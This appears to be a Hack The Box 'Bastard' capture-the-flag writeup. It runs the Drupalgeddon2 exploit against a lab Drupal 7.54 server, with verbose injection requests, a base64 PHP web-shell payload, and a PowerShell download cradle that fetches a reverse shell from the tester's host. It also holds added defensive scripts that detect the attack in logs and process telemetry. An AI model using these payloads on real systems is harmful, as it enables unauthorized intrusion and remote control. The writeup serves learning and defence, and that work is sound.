
HacktheBox 'Bastard' writeup


‘Bastard’ HTB Writeup

 

Host Information

Hostname   IP Address   Operating System   Difficulty Level
Bastard    10.10.10.9   Windows            Medium

Bastard HTB Card


 


 




 

Initial Recon

 

Again, we start with our initial recon of the target system. This time we'll use a different script, AutoRecon. Information on the script and install instructions are on its GitHub page.

 

nmap information

# Nmap 7.80 scan initiated Mon Feb 10 09:49:30 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /writeups/HTB/bastard/enumeration/results/10.10.10.9/scans/_full_tcp_nmap.txt -oX /writeups/HTB/bastard/enumeration/results/10.10.10.9/scans/xml/_full_tcp_nmap.xml 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up, received user-set (0.034s latency).
Scanned at 2020-02-10 09:49:30 CST for 214s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT      STATE SERVICE REASON          VERSION
80/tcp    open  http    syn-ack ttl 127 Microsoft IIS httpd 7.5
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries 
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php 
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ 
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ 
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ 
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp   open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open  msrpc   syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=2/10%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5E417C60%P=x86_64-pc-linux-gnu)
SEQ(SP=100%GCD=1%ISR=10E%TI=I%II=I%SS=S%TS=7)
OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M54DNW8ST11%O6=M54DST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=80%W=2000%O=M54DNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.009 days (since Mon Feb 10 09:39:32 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 135/tcp)
HOP RTT      ADDRESS
1   28.45 ms 10.10.14.1
2   28.53 ms 10.10.10.9

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb 10 09:53:04 2020 -- 1 IP address (1 host up) scanned in 214.65 seconds

We see we have a Windows server (likely 2008R2) with both HTTP open and two RPC ports.

 

examining HTTP

Let’s check out HTTP on port 80 first. Upon hitting the main URL, we’re redirected to a login page. There’s not much info on the page besides the login fields and the Create New Account and Request New Password links. A small footer at the bottom says “Powered by Drupal,” so we have a good idea of the framework the website is using, but we don’t know the version yet. Viewing the page source seems to indicate it is Drupal 7.

Let’s go ahead and look for default creds to Drupal 7, if there are any, and check out what might exist on searchsploit for the version. From some quick searching, it looks like the default admin user is “admin” but there is no default password. The source doesn’t give a hint, and trying admin/admin doesn’t seem to work.

Looking at robots.txt from our initial enumeration, though, yields some interesting potential results:

# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/

So we know the server is running PHP, which gives us some good information on the potential attack surface, and we see some basic URI structure, with user paths being passed as the q query string. We also see that admin directories are disallowed. /admin, as we saw earlier, expectedly returns a 403. Trying to visit http://10.10.10.9/admin/q?=admin/login to attempt to “force” a login results in a 403 Forbidden as well.

Going to CHANGELOG.txt, we see that a number of vulnerabilities have been patched, and we see the current Drupal version (assuming the doc is up to date): 7.54. We also know from the nmap output that the IIS server hosting the Drupal site is 7.5.

Moving on to searchsploit, we see a number of exploits returned:

root@kali:/writeups/HTB/bastard/exploits# searchsploit drupal 7.5
-------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                            |  Path
                                                                          | (/usr/share/exploitdb/)
-------------------------------------------------------------------------- ----------------------------------------
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)  | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (Po | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code | exploits/php/webapps/44449.rb
-------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looks like the top two results need authentication in order to run the exploit, and we don’t have credentials yet. The third result could be promising; let’s examine it.
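The version disclosure in CHANGELOG.txt is the piece of information that makes the searchsploit results actionable, so a defender's first check is the same one in reverse: read the version the file advertises and compare it with the first fixed release of its branch. The script below is an added example, not part of the original writeup or the AutoRecon/searchsploit tooling; the CHANGELOG excerpt is constructed in the layout Drupal 7 ships, and the fixed-version table is taken from the searchsploit titles above (7.58, 8.3.9, 8.4.6, 8.5.1).

```python
import re

# Constructed CHANGELOG.txt excerpt in the layout Drupal 7 ships (not the target's file).
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition).
- Fixed a bug in the text filter system.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed drag and drop support on newer Chrome/IE 11+ versions.
"""

# First fixed release per branch, from the searchsploit titles above
# ("Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1"). 7.x is one branch;
# 8.x is keyed by minor branch because each got its own fix release.
FIXED_VERSIONS = {
    (7,): (7, 58),
    (8, 3): (8, 3, 9),
    (8, 4): (8, 4, 6),
    (8, 5): (8, 5, 1),
}


def parse_drupal_version(changelog_text):
    """Return the newest version named in a CHANGELOG.txt as an int tuple, or None.
    Drupal lists the newest release first, so the first heading wins."""
    match = re.search(r"^Drupal (\d+(?:\.\d+)+),", changelog_text, re.MULTILINE)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def fixed_version_for(version):
    """Find the fix for the branch this version belongs to: minor branch first
    (8.x style), then the whole major (7.x style). None if the table lacks it."""
    for key in ((version[0], version[1]), (version[0],)):
        if key in FIXED_VERSIONS:
            return FIXED_VERSIONS[key]
    return None


def is_vulnerable(version):
    """True if the version predates its branch fix, False if it is at or past it,
    None when the branch is not covered by the table (unsupported/EOL branch)."""
    fixed = fixed_version_for(version)
    if fixed is None:
        return None
    return version < fixed  # tuple comparison: (7, 54) < (7, 58)


def assess(changelog_text):
    """One-call summary a scanner or a patch-compliance check can consume."""
    version = parse_drupal_version(changelog_text)
    if version is None:
        return {"version": None, "vulnerable": None, "fixed_in": None}
    return {
        "version": version,
        "vulnerable": is_vulnerable(version),
        "fixed_in": fixed_version_for(version),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

The tuple comparison is what makes this safe against the usual string-compare trap (as strings, "7.9" sorts after "7.54"). Note that robots.txt disallowing /CHANGELOG.txt does not stop anyone from fetching it; the fix on the server side is to remove or block the file, not to list it in robots.txt.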

 

finding a drupal exploit

Let’s go ahead and save the exploit locally to our exploits folder, then view it to see what we need to change.

root@kali:/writeups/HTB/bastard/exploits# searchsploit -m exploits/php/webapps/44449.rb
  Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/44449
     Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
File Type: Ruby script, ASCII text, with CRLF line terminators

Copied to: /writeups/HTB/bastard/exploits/44449.rb


root@kali:/writeups/HTB/bastard/exploits# mv 44449.rb drupal_rce.rb

When running the script to get usage information, we encounter the following:

root@kali:/writeups/HTB/bastard/exploits# ruby drupal_rce.rb 
ruby: warning: shebang line ending with \r may cause problems
Traceback (most recent call last):
        2: from drupal_rce.rb:16:in `<main>'
        1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- highline/import (LoadError)

So let’s install the highline ruby gem module like so:

root@kali:/writeups/HTB/bastard/exploits# gem install highline
Fetching: highline-2.0.3.gem (100%)
Successfully installed highline-2.0.3
Parsing documentation for highline-2.0.3
Installing ri documentation for highline-2.0.3
Done installing documentation for highline after 1 seconds
1 gem installed

We see the following for usage info:

Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose]
Example for target that does not require authentication:
       ruby drupalgeddon2.rb https://example.com
Example for target that does require authentication:
       ruby drupalgeddon2.rb https://example.com --authentication

Since we don’t have credentials, let’s try the unauthenticated version first.

 

initial exploitation

root@kali:/writeups/HTB/bastard/exploits# ruby drupal_rce.rb http://10.10.10.9 --verbose
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://10.10.10.9/
--------------------------------------------------------------------------------
[v] HTTP - URL : http://10.10.10.9/CHANGELOG.txt
[v] HTTP - Type: get
[+] Found  : http://10.10.10.9/CHANGELOG.txt    (HTTP Response: 200)    [HTTP Size: 9]
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Form   (user/password)
[v] HTTP - URL : http://10.10.10.9/?q=user/password
[v] HTTP - Type: get
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Clean URLs
[v] HTTP - URL : http://10.10.10.9/user/password
[v] HTTP - Type: get
[+] Result : Clean URLs enabled
--------------------------------------------------------------------------------
[*] Testing: Code Execution   (Method: name)
[i] Payload: echo PHZWRUFM
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PHZWRUFM
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o
[+] Result : PHZWRUFM
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file   (http://10.10.10.9/shell.php)
[v] HTTP - URL : http://10.10.10.9/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-9xww0EbPk0CUe1zOu552rgBgpWkWby1l4T_PtRzM7y4
[v] HTTP - URL : http://10.10.10.9/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/shell.php)
[v] HTTP - URL : http://10.10.10.9/sites/default/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-nwYlrM9G2ZeetA95w7hhcfCl-5FZFqb-9_WFCfxJUcQ
[v] HTTP - URL : http://10.10.10.9/sites/default/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Existing file   (http://10.10.10.9/sites/default/files/shell.php)
[v] HTTP - URL : http://10.10.10.9/sites/default/files/shell.php
[v] HTTP - Type: get
[i] Response: HTTP 404 // Size: 12
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
[*] Testing: Writing To Web Root   (sites/default/files/)
[*] Moving : ./sites/default/files/.htaccess
[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[v] Element    : name
[v] PHP fn     : passthru
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-gMMR9M2cHE4yA9kgQH07LoiuqTn6AK-olCttKYmfxS4
[v] HTTP - URL : http://10.10.10.9/sites/default/files/shell.php
[v] HTTP - Type: post
[v] HTTP - Data: c=hostname
[!] Target is NOT exploitable [2-4] (HTTP Response: 404)...   Might not have write access?
[!] FAILED : Couldn't find a writeable web path
--------------------------------------------------------------------------------
[*] Dropping back to direct OS commands
drupalgeddon2>> 

So apparently we don’t have write access to the web root, but we’re dropped into a drupalgeddon2 prompt. Earlier in the output, the exploit did report that it found code execution. So this prompt appears to be a handler/wrapper for an OS shell: every time we run a command, it’s executed remotely through the Drupal URI. It seems we have an initial foothold, which is good.
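Every command run through that prompt produces the same two-request pattern in the verbose output above: a POST to the user/password form carrying name[#post_render][], name[#type] and name[#markup], followed by a POST to file/ajax/name/#value/<form_build_id>. That makes the attack easy to pick out of IIS logs after the fact. The following is an added detection example, not part of the original writeup or the exploit script; the log excerpt is constructed in IIS W3C format with the field list given in its #Fields header (the real file's field order may differ, which is why the parser reads the header rather than hard-coding positions).

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not the target's real logs). The first two
# lines mirror the two-request pattern the exploit output shows above; the
# rest is ordinary traffic. IIS writes spaces inside a query string as '+'.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) sc-status
2020-02-10 15:51:02 10.10.10.9 POST / q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo+PHZWRUFM 80 10.10.14.50 Ruby 200
2020-02-10 15:51:03 10.10.10.9 POST / q=file/ajax/name/%23value/form-arECmTPq5WunM4SaKf45rfoim2E1FAowMBhElJOD99o 80 10.10.14.50 Ruby 200
2020-02-10 15:52:10 10.10.10.9 POST / q=user/password 80 10.10.14.7 Mozilla/5.0 302
2020-02-10 15:52:11 10.10.10.9 GET /misc/drupal.js - 80 10.10.14.7 Mozilla/5.0 200
"""

# A browser submitting a Drupal form never sends '#'-prefixed Form API
# properties (e.g. name[#post_render]) as request parameters; those keys only
# exist server-side. Their presence in a request is the tell, whatever the
# callback or element name used.
FORM_API_PROPERTY = re.compile(r"\[#[a-z_]+\]", re.IGNORECASE)
# Second stage: the AJAX callback asked to render a '#'-keyed element.
AJAX_RENDER = re.compile(r"file/ajax/[^?&]*#", re.IGNORECASE)


def parse_iis_log(text):
    """Yield one dict per request, naming columns from the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue  # comments, blanks, or data before any header
        yield dict(zip(fields, line.split(" ")))


def classify(entry):
    """Return a reason string if the request looks like Drupalgeddon2, else None.
    Stem and query are decoded and joined so both the ?q= form and the
    clean-URL form (/user/password?name[...]) are covered."""
    stem = unquote_plus(entry.get("cs-uri-stem", ""))
    query = entry.get("cs-uri-query", "-")
    target = stem + "?" + unquote_plus("" if query == "-" else query)
    if FORM_API_PROPERTY.search(target):
        return "form-api-property-in-request"
    if AJAX_RENDER.search(target):
        return "ajax-render-of-injected-element"
    return None


def find_suspicious(text):
    """All flagged requests with the fields an analyst needs to pivot on."""
    hits = []
    for entry in parse_iis_log(text):
        reason = classify(entry)
        if reason:
            hits.append({
                "time": entry["date"] + " " + entry["time"],
                "client": entry["c-ip"],
                "reason": reason,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_IIS_LOG):
        print(hit)
```

Decoding before matching matters: IIS stores the query percent-encoded, so a rule that greps the raw line for "#post_render" misses it, while one that greps for "%23post_render" misses requests sent with a literal "#". The first rule is deliberately generic (any '#'-keyed property in any form element) rather than tied to post_render, so it does not depend on which callback a given exploit variant uses.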

 

further enumeration

Let’s run a systeminfo command to get some basic info on the system:

drupalgeddon2>> systeminfo
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=systeminfo
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-WJURmjUQgI_Fp2Rdz0iVlYRZ5CFrQfYPxgkl0W0PsW4
Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 ��
System Boot Time:          10/2/2020, 5:39:28 ��
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.495 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.509 MB
Virtual Memory: In Use:    586 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Great, so we see that it is indeed a 2008R2 Datacenter build, allegedly with no hotfixes installed.

Let’s see if we can view what users are on the system:

drupalgeddon2>> whoami
[v] HTTP - URL : http://10.10.10.9/?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=whoami
[v] HTTP - Type: post
[v] HTTP - Data: form_id=user_pass&_triggering_element_name=name
[v] Form name  : form_build_id
[v] Form value : form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
[v] HTTP - URL : http://10.10.10.9/?q=file/ajax/name/%23value/form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
[v] HTTP - Type: post
[v] HTTP - Data: form_build_id=form-4c407AErUVd8TvQTXNCwXYYWrnN_Pepi4jX874aon_k
nt authority\iusr

 

gaining a foothold

The “net users” command does not seem to work, in multiple variants including URL encoding. Let’s try to get a more standard shell by leveraging PowerShell to catch a remote session. We’ll use this PowerShell script to invoke a reverse TCP shell, save it as shell.ps1 in our exploits folder, and serve that folder over SimpleHTTP with python -m SimpleHTTPServer 8080.

Now let’s attempt to retrieve and execute the file with PowerShell from our foothold shell on the target host. In the PowerShell invoke-TCP command I’ve specified my tun0 IP address, as well as port 4444. This may not work well since the RCE passes through a URL, but let’s give it a shot. We’ll want to run the following:

powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')"

Executing it at the drupalgeddon2 prompt seems to make the prompt hang while the process executes, but if we quickly check the listener we started with nc -lvnp 4444, we see we received a shell:

root@kali:~# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.9] 53359
Windows PowerShell running as user BASTARD$ on BASTARD
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\drupal-7.54>

The Drupal exploit seems to time out on that command and return to the exploit prompt; fortunately, our shell is already caught and appears to be stable.
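From the host side, the foothold above has a distinctive shape regardless of the web vulnerability used to get it: the PHP worker process, running as the IIS anonymous account (nt authority\iusr, as whoami showed), spawns cmd.exe, which launches powershell.exe with an IEX/DownloadString cradle. The script below is an added example of scoring process-creation telemetry for that chain; it is not part of the writeup or of any product. The records are constructed in the shape of Sysmon Event ID 1 fields, and the PHP worker path C:\PHP\php-cgi.exe and the script path in the benign event are assumptions for the sample.

```python
import ntpath   # splits Windows paths correctly even when this runs on Linux
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1
# fields (not real telemetry from the target). The first two mirror the chain
# the reverse shell above produces; the last two are ordinary activity.
EVENTS = [
    {"ParentImage": r"C:\PHP\php-cgi.exe",                  # assumed PHP FastCGI path
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')\"",
     "User": r"NT AUTHORITY\IUSR"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.50:8080/shell.ps1')\"",
     "User": r"NT AUTHORITY\IUSR"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",   # assumed benign admin script
     "User": r"BASTARD\dimitris"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs",
     "User": r"NT AUTHORITY\SYSTEM"},
]

WEB_WORKERS = {"w3wp.exe", "php-cgi.exe"}   # IIS worker process and PHP FastCGI worker
SHELLS = {"cmd.exe", "powershell.exe"}
# Download-and-execute cradle keywords; \b keeps "IEX" from matching inside other words.
DOWNLOAD_CRADLE = re.compile(r"\b(DownloadString|DownloadFile|Invoke-Expression|IEX)\b", re.IGNORECASE)


def score_event(event):
    """Return the names of every rule the event trips (empty list = nothing of note)."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    image = ntpath.basename(event.get("Image", "")).lower()
    user = event.get("User", "").lower()
    hits = []
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web-worker-spawns-shell")        # web server should never need a shell
    if DOWNLOAD_CRADLE.search(event.get("CommandLine", "")):
        hits.append("download-cradle")                # fetch-and-run from a remote host
    if user.endswith("\\iusr") or user.startswith("iis apppool\\"):
        hits.append("web-service-account")            # anonymous web identity running processes
    return hits


def triage(events):
    """Map event index -> rule names, for events that tripped at least one rule."""
    scored = {i: score_event(e) for i, e in enumerate(events)}
    return {i: rules for i, rules in scored.items() if rules}


if __name__ == "__main__":
    for index, rules in triage(EVENTS).items():
        print(index, EVENTS[index]["Image"], rules)
```

The three rules are independent on purpose: the second event (cmd.exe launching PowerShell) does not trip the parent-child rule on its own, but the cradle and the service-account identity still flag it. An alert that requires all three to fire would miss that event; one that fires on any of them will also catch a legitimate admin script that happens to use DownloadString, so the combination and the user context are what give an analyst confidence.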

Continuing our enumeration, we see the users on the system:

PS C:\inetpub\drupal-7.54> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            dimitris                 Guest                    
The command completed with one or more errors.

PS C:\inetpub\drupal-7.54> 

Let’s see if we have permissions to grab the user flag yet.

PS C:\users\dimitris\Desktop> dir


    Directory: C:\users\dimitris\Desktop


Mode                LastWriteTime     Length Name                              
----                -------------     ------ ----                              
-ar--         19/3/2017   8:06 ??         32 user.txt   

